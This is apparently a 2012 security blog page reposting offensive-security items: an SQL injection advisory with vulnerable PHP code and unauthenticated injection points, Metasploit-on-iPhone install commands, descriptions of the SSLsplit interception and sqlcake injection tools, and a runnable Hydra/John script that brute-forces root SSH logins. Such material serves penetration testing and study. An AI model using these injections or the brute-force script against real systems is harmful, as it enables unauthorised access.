Jun 1, 2012

Simple Web Content Management System SQL Injection

If you want all vulnerability of this post, please go to the Source.

######################################################################################
# Exploit Title: Simple Web Content Management System SQL Injection
# Date: May 30th 2012
# Author: loneferret
# Version: 1.1
# Application Url: http://www.cms-center.com/
# Tested on: Ubuntu Server 8.04 / PHP Version 5.2.4-2ubuntu5.23
######################################################################################
# Discovered by: loneferret
######################################################################################

# Side note:
# This application is nothing fancy, and really shouldn't be used other than
# for practicing SQLi. Pretty much every page has at least one (1) vulnerable
# parameter.

# Vulnerability:
# Due to improper input sanitization, many parameters are prone to SQL injection.
# Most of them require to be authenticated with an account (admin).
# But there are a few pages that will cause an error without having to logon.


# PoC 1:
# No Authentication Required.
# Page: /admin/item_delete.php?id=[SQLi]
# Vulnerable Parameter: id
# Code:
15      $id = $_GET['id'];
16      $title = NULL;
17      $text = NULL;
18      database_connect();
19      $query = "select title,text from content where id = $id;";
20      //echo $query;
21      $result = mysql_query($query);

# As stated, nothing is checked before passing "id" to MySql.
# This results in a MySql error.



# PoC 2:
# No Authentication Required.
# Page: /admin/item_status.php?id=[SQLi]&status=1
# Page: /admin/item_status.php?id=1&status=[SQLi]
# Vulnerable Parameter: id & status
# Code:
10    $ref = $_GET['ref'];
11    $id = $_GET['id'];
12    $status = $_GET['status'];
13    $update = "UPDATE content
14            SET status='$status'
15            WHERE id='$id'";
16    $query = mysql_query($update)
        or die("Their was a problem updating the status: ". mysql_error());

# As stated, nothing is checked before passing "id" and/or "status" to MySql.
# This results in a MySql error.


Source: http://www.exploit-id.com/web-applications/simple-web-content-management-system-1-1-multiple-sql-injection

If you like my blog, Please Donate Me

May 31, 2012

Metasploit 4 on iPhone 4S & iPad 2

# Install basic tools
apt-get update

apt-get dist-upgrade

apt-get install
wget subversion

# Download correct version of ruby and dependencies

wget
http://ininjas.com/repo/debs/ruby_1.9.2-p180-1-1_iphoneos-arm.deb
wget
http://ininjas.com/repo/debs/iconv_1.14-1_iphoneos-arm.deb
wget
http://ininjas.com/repo/debs/zlib_1.2.3-1_iphoneos-arm.deb

# Install them

dpkg
-i iconv_1.14-1_iphoneos-arm.deb
dpkg
-i zlib_1.2.3-1_iphoneos-arm.deb
dpkg
-i ruby_1.9.2-p180-1-1_iphoneos-arm.deb

# Delete them

rm
-rf *.deb

# Go into /private var and svn checkout the msf trunk.

# Don't download the MSF tar.gz due to svn client versioning issues


cd
/private/var
svn co
https://www.metasploit.com/svn/framework3/trunk/ msf3
cd
msf3/

# Check that Metasploit is running

ruby msfconsole


Source: https://www.offensive-security.com/offsec/metasploit-4-on-iphone-4s-and-ipad-2/

If you like my blog, Please Donate Me

May 29, 2012

SSLsplit – transparent and scalable SSL/TLS interception

SSLsplit is a tool for man-in-the-middle attacks against SSL/TLS encrypted network connections. Connections are transparently intercepted through a network address translation engine and redirected to SSLsplit. SSLsplit terminates SSL/TLS and initiates a new SSL/TLS connection to the original destination address, while logging all data transmitted. SSLsplit is intended to be useful for network forensics and penetration testing.
SSLsplit supports plain TCP, plain SSL, HTTP and HTTPS connections over both IPv4 and IPv6. For SSL and HTTPS connections, SSLsplit generates and signs forged X509v3 certificates on-the-fly, based on the original server certificate subject DN and subjectAltName extension. SSLsplit fully supports Server Name Indication (SNI) and is able to work with RSA, DSA and ECDSA keys and DHE and ECDHE cipher suites. SSLsplit can also use existing certificates of which the private key is available, instead of generating forged ones. SSLsplit supports NULL-prefix CN certificates and can deny OCSP requests in a generic way.

Source: http://www.roe.ch/SSLsplit


If you like my blog, Please Donate Me

SQLCake - an automatic sql injection exploitation kit

What is sqlcake?

sqlcake is an automatic SQL injection exploitation kit written in Ruby. It's designed for system administration and penetration testing.

sqlcake offers a few useful functions to gather database information easily by sql injection usage.

sqlcake also allows you to bypass magic quotes, dump tables and columns and gives you the possibility to run an interactive MySQL shell.

sqlcake supports union stacked queries for real fast processing and blind injections with logarithmic techniques for saving time.


Source: http://sqlcake.sourceforge.net/

If you like my blog, Please Donate Me

May 28, 2012

THC-Hydra password bruteforcing with john the ripper - http://funoverip.net

#!/bin/sh

hydra="/usr/local/bin/hydra"
john="/usr/bin/john"

hydra_module="ssh2"
hydra_host="127.0.0.1"
hydra_port="22"
hydra_nb_task="10"
hydra_all_params="-f -s $hydra_port -t $hydra_nb_task -e ns "

john_sessionfile="$1"
john_all_params="--incremental:Alpha --stdout"
john_time_step=20   # time (seconds) to run john

tmp_passwd="/tmp/pwd1234.tmp"
hydra_logfile="/tmp/hydralog"

if [ "$1" = "" ];then
    echo "Usage: $0 <john session file>"
    exit 0
fi

#for lfile in `ls $loginfiles*`;do

while [ 1 ];do
    # generate some password with john the ripper
    echo; echo "- Start (re)generating passwords with John"
    if [ -e "$john_sessionfile.rec" ];then
        # if session exist, restore it
        $john --restore=$john_sessionfile  > $tmp_passwd &
    else
        # if session not exist yet, create it
        $john $john_all_params --session=$john_sessionfile > $tmp_passwd &
    fi

    # wait 100 seconds, then kill john and start hydra on it
    echo "- Wait ..."
    sleep $john_time_step
    echo "- Kill john"
    killall john 2>/dev/null 1>/dev/null
    sleep 1

    # start hydra
    echo; echo "- Start hydra"; echo

    rm -f $hydra_logfile
    echo "$hydra -l root -P $tmp_passwd $hydra_all_params $hydra_host $hydra_module | tee -a $hydra_logfile"
    $hydra -l root -P $tmp_passwd $hydra_all_params $hydra_host $hydra_module | tee -a $hydra_logfile

    # if a valid pair has been found, stop the loop
    if [ "`grep $hydra_module $hydra_logfile | grep -v DATA`" != "" ];then
        echo; echo "FOUND !!"
        grep $hydra_module $hydra_logfile | grep -v DATA
        exit 0
    fi

done


Source: http://funoverip.net/2010/12/thc-hydra-password-bruteforcing-with-john-the-ripper/

If you like my blog, Please Donate Me

jasagerpwn - Jasager attack vector script for BackTrack 5 and Ubuntu.

This script is going to assume your using BackTrack 4/5 with /pentest/, if you have it somewhere else just adjust the variables accordingly.

This can work with normal ubuntu as well, But keep in mind the setup of the OS will take some more work and general linux skill.

The following dependencies are required for full functionality of the script..

Dependencies: PHP5, Apache2, INSTALLED Metasploit, Social Engineering Toolkit, Macchanger, Dsniff Suite, DHCP3, INSTALLED SSLstrip, INSTALLED airdrop-ng, Aircrack-ng suite w/ working Injection. 



Source: https://code.google.com/p/jasagerpwn/


If you like my blog, Please Donate Me

 

Sponsors

lusovps.com

Blogroll

About

 Please subscribe my blog.

 Old Subscribe

Share |